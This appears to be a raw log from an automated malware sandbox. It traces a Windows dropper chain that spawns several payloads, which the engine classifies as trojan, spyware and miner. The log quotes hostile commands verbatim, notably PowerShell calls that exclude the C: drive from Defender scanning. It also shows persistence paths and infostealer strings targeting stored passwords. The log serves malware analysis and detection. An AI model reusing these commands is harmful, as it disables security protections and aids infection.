                          Source: 8sb9w_003.exe.11.drStatic PE information: Section: ss2 ZLIB complexity 0.9900907166901125
                          Source: yo7qmvz[1].exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003218217329546
                          Source: yo7qmvz.exe.11.drStatic PE information: Section: .bss ZLIB complexity 1.0003218217329546
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.mine.winEXE@68/75@8/11
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00444F20 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,17_2_00444F20
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s7MG2VL[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeMutant created: \Sessions\1\BaseNamedObjects\{50F42A1A-B6A4-4061-9A0E-590D796A31D5}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2116:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:828:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4628:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeMutant created: \Sessions\1\BaseNamedObjects\{C6104D2F-6E33-4EA3-8446-2A8BEC2D380E}
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeMutant created: \Sessions\1\BaseNamedObjects\{4B1446C5-9CA8-4F63-9E71-7906C78EFD2F}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1416
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeMutant created: \Sessions\1\BaseNamedObjects\{EF799D21-6109-4132-982B-0DFD982FC84D}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess412
                          Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\{69A50EDD-D88F-4F3E-BB56-32D66C78FC09}
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4aJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.bat" """
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: s7MG2VL.exe, 0000000C.00000003.1892323418.0000000005D9C000.00000004.00000800.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1920018518.0000000005DBF000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938061078.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1963270681.0000000003862000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938705885.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2035460187.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2003030716.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2002131522.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2173072413.0000000003351000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2130048847.0000000003335000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2173459895.0000000003347000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 13s1HMkHKv.exeVirustotal: Detection: 58%
                          Source: 13s1HMkHKv.exeReversingLabs: Detection: 60%
                          Source: 13s1HMkHKv.exeString found in binary or memory: " /add
                          Source: 13s1HMkHKv.exeString found in binary or memory: " /add /y
                          Source: 13s1HMkHKv.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: rapes.exeString found in binary or memory: " /add
                          Source: rapes.exeString found in binary or memory: " /add /y
                          Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: rapes.exeString found in binary or memory: " /add
                          Source: rapes.exeString found in binary or memory: " /add /y
                          Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: rapes.exeString found in binary or memory: " /add
                          Source: rapes.exeString found in binary or memory: " /add /y
                          Source: s7MG2VL.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile read: C:\Users\user\Desktop\13s1HMkHKv.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\13s1HMkHKv.exe "C:\Users\user\Desktop\13s1HMkHKv.exe"
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe "C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe"
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 404
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 408
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeProcess created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe"
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.bat" """
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe "C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe" ""
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe "C:\Users\user\AppData\Local\Temp\\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe" "{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}"
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe"
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                          Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe "C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeProcess created: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe "C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe"
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe "C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe"
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe "C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe "C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe "C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.bat" """
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe "C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe" ""
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe "C:\Users\user\AppData\Local\Temp\\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe" "{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}"
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeProcess created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe"
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe"
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                          Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe "C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeProcess created: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: wldp.dllJump to behavior
